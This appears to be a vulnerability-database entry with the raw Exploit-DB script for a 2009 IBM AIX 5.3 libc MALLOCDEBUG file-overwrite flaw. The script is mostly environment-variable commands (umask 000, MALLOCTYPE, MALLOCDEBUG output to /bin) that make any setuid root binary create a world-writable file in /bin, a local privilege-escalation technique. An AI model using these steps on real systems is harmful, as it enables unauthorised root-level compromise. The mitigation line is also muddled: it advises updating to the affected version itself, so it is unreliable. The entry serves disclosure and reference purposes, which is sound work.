IBM AIX libc MALLOCDEBUG File Overwrite Vulnerability

vendor:

AIX

by:

Affix

7,2

CVSS

HIGH

File Overwrite

264

CWE

Product Name: AIX

Affected Version From: AIX 5.3 ML 5

Affected Version To: AIX 5.3 ML 5

Patch Exists: Yes

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: IBM AIX

2009

IBM AIX libc MALLOCDEBUG File Overwrite Vulnerability

AIX 5.3 ML 5 is vulnerable to a file overwrite vulnerability due to a bad libc code. The vulnerability can be exploited by setting the environment variables MALLOCTYPE=debug and MALLOCDEBUG=report_allocations,output:/bin/filename. This will create a file with 777 permissions in the /bin directory.

Mitigation:

Update to the latest version of AIX 5.3 ML 5 or later.

Source

Exploit-DB raw data:

#!/bin/bash
#################################################################
#		      _______ _________ _       						#
#		     (  ____ )\__   __/( (    /|						#
#		     | (    )|   ) (   |  \  ( |						#
#		     | (____)|   | |   |   \ | |						#
#		     |     __)   | |   | (\ \) |						#
#		     | (\ (      | |   | | \   |						#
#		     | ) \ \__   | |   | )  \  |						#
#		     |/   \__/   )_(   |/    )_)						#
#                        http://root-the.net 					#
#################################################################
#[+] IBM AIX libc MALLOCDEBUG File Overwrite Vulnerability		#
#[+] Refer : securitytracker.com/id?1022261                     #
#[+] Exploit : Affix <root@root-the.net>						#
#[+] Tested on : IBM AIX										#
#[+] Greetz : Mad-Hatter, Atomiku, RTN, Terogen, SCD, Boxhead,  #
#	      str0ke, tekto, SonicX, Android, tw0, d0nk, Redskull	#
# AIX 5.3 ML 5 is where this bad libc code was added.			#
# Libs Affected :												#
#	/usr/ccs/lib/libc.a											#
#	/usr/ccs/lib/libp/libc.a									#
#################################################################

Set the following environment variables:

umask 000
MALLOCTYPE=debug
MALLOCDEBUG=report_allocations,output:/bin/filename

echo "Now run any setuid root binary.. /bin/filename will be created with 777 permissions."

# milw0rm.com [2009-07-30]